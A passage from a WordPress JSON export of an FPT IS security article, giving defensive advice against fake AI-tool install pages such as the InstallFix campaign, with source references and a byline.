sans-serif;font-size: 12pt\">download the script first<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">read the script content<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">verify the domain and checksum<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Avoid running the terminal as Administrator\/root unless necessary.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Many malware programs only become dangerous when users run the terminal with elevated privileges.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Limit:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">using sudo by default<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">frequently opening PowerShell as Administrator<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">granting root access to tools from unknown sources<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Protect developer credentials<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">use MFA for all accounts<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">rotate tokens regularly<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">do not store secrets in plaintext<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">use a password manager<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">prioritize hardware security keys (YubiKey\/FIDO2)<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Separate development environments from personal accounts<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Avoid:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">using the same browser for work and personal use<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">storing cloud credentials on personal devices that aren&#8217;t hardened<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">developing directly on machines with important data<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Do<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">use a VM\/dev container<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">use separate browser profiles<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">sandbox untrusted AI tools<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Update awareness about AI-related threats<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The AI ecosystem is becoming a new target for attackers. In the near future, similar campaigns are likely to expand to:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">AI IDE plug-ins<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">MCP servers<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">AI agents<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">VSCode extensions<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">fake npm\/pypi packages<\/span><\/li>\n<\/ul>\n<h2 id=\"refer\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Refer<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/26\/e\/installfix-and-claude-code.html\" target=\"_blank\" rel=\"noopener ugc nofollow\">InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise | Trend Micro (US)<\/a><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><a href=\"https:\/\/socprime.com\/active-threats\/installfix-uses-fake-claude-pages\/\" target=\"_blank\" rel=\"noopener ugc nofollow\">InstallFix Uses Fake Claude Pages for Fileless Attacks<\/a><\/span><\/p>\n<table style=\"border-collapse: collapse;width: 100%\">\n<tbody>\n<tr>\n<td style=\"width: 100%\">\n<div class=\"qMYqUG_convSearchResultHighlightRoot\">\n<div class=\"\" data-turn-id-container=\"request-WEB:228c75c1-b25b-4991-841c-b306d79af9e7-7\" data-is-intersecting=\"true\">\n<section class=\"text-token-text-primary w-full focus:outline-none has-data-writing-block:pointer-events-none [&amp;:has([data-writing-block])&gt;*]:pointer-events-auto R6Vx5W_threadScrollVars scroll-mb-[calc(var(--scroll-root-safe-area-inset-bottom,0px)+var(--thread-response-height))] scroll-mt-[calc(var(--header-height)+min(200px,max(70px,20svh)))]\" dir=\"auto\" data-turn-id=\"request-WEB:228c75c1-b25b-4991-841c-b306d79af9e7-7\" data-turn-id-container=\"request-WEB:228c75c1-b25b-4991-841c-b306d79af9e7-7\" data-testid=\"conversation-turn-16\" data-scroll-anchor=\"false\" data-turn=\"assistant\">\n<div class=\"text-base my-auto mx-auto pb-10 [--thread-content-margin:var(--thread-content-margin-xs,calc(var(--spacing)*4))] @w-sm\/main:[--thread-content-margin:var(--thread-content-margin-sm,calc(var(--spacing)*6))] @w-lg\/main:[--thread-content-margin:var(--thread-content-margin-lg,calc(var(--spacing)*16))] px-(--thread-content-margin)\">\n<div class=\"[--thread-content-max-width:40rem] @w-lg\/main:[--thread-content-max-width:48rem] mx-auto max-w-(--thread-content-max-width) flex-1 group\/turn-messages focus-visible:outline-hidden relative flex w-full min-w-0 flex-col agent-turn\">\n<div class=\"flex max-w-full flex-col gap-4 grow\">\n<div class=\"min-h-8 text-message relative flex w-full flex-col items-end gap-2 text-start break-words whitespace-normal outline-none keyboard-focused:focus-ring [.text-message+&amp;]:mt-1\" dir=\"auto\" data-message-author-role=\"assistant\" data-message-id=\"b3fa8bb2-1bc4-4a92-b360-c042ba93082c\" data-message-model-slug=\"gpt-5-5\" data-turn-start-message=\"true\">\n<div class=\"flex w-full flex-col gap-1 empty:hidden\">\n<div class=\"markdown prose dark:prose-invert wrap-break-word w-full light markdown-new-styling\">\n<p data-start=\"0\" data-end=\"210\" data-is-last-node=\"\" data-is-only-node=\"\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Exclusive article by experts from <span class=\"hover:entity-accent entity-underline inline cursor-pointer align-baseline\"><span class=\"whitespace-normal\">FPT IS<\/span><\/span>, <span class=\"hover:entity-accent entity-underline inline cursor-pointer align-baseline\"><span class=\"whitespace-normal\">FPT Corporation<\/span><\/span><\/strong><\/span><\/p>\n<p data-start=\"0\" data-end=\"210\" data-is-last-node=\"\" data-is-only-node=\"\"><br data-start=\"110\" data-end=\"113\" \/><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><em>Luu Tuan Anh \u2013 Information Security &amp; Cybersecurity Center, <span class=\"hover:entity-accent entity-underline inline cursor-pointer align-baseline\"><span class=\"whitespace-normal\">FPT IS<\/span><\/span><\/em><\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/section>\n<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"author":21,"featured_media":24621,"parent":0,"template":"","nang_luc":[],"danh_muc_goc_nhin_so":[],"dich_vu":[],"linh_vuc":[],"platform":[],"san_pham":[],"the_goc_nhin_so":[],"class_list":["post-24620","goc_nhin_so","type-goc_nhin_so","status-publish","has-post-thumbnail","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so\/24620","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so"}],"about":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/types\/goc_nhin_so"}],"author":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/users\/21"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media\/24621"}],"wp:attachment":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media?parent=24620"}],"wp:term":[{"taxonomy":"nang_luc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/nang_luc?post=24620"},{"taxonomy":"danh_muc_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/danh_muc_goc_nhin_so?post=24620"},{"taxonomy":"dich_vu","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/dich_vu?post=24620"},{"taxonomy":"linh_vuc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/linh_vuc?post=24620"},{"taxonomy":"platform","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/platform?post=24620"},{"taxonomy":"san_pham","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/san_pham?post=24620"},{"taxonomy":"the_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/the_goc_nhin_so?post=24620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}